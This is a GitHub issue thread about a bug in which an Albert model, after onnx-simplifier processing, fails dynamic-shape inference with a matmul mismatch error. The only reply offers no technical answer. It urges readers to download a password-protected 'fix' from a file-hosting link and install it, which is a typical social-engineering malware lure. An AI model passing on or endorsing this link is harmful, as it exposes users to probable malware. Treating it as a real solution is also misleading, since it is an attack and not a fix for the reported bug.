Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] Albert模型简化后没法动态shape推理 #342

Open
demeiyan opened this issue Aug 27, 2024 · 1 comment
Open

[BUG] Albert模型简化后没法动态shape推理 #342

demeiyan opened this issue Aug 27, 2024 · 1 comment

Comments

@demeiyan
Copy link

demeiyan commented Aug 27, 2024

使用onnx-simplifier 简化后,序列长度为512可以进行推理,但是序列长度变成106就推理报错,试过动态维度都不行,这个是啥问题?
报下面的错误:
Faith: 1.3.0p10: [ERROR] tid 20859 matmul.cpp:L60 Invalid return code: Expected SUCCESS, but got (Not Match) = NOT_MATCH.

@amir1387aht
Copy link

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants
@demeiyan @amir1387aht and others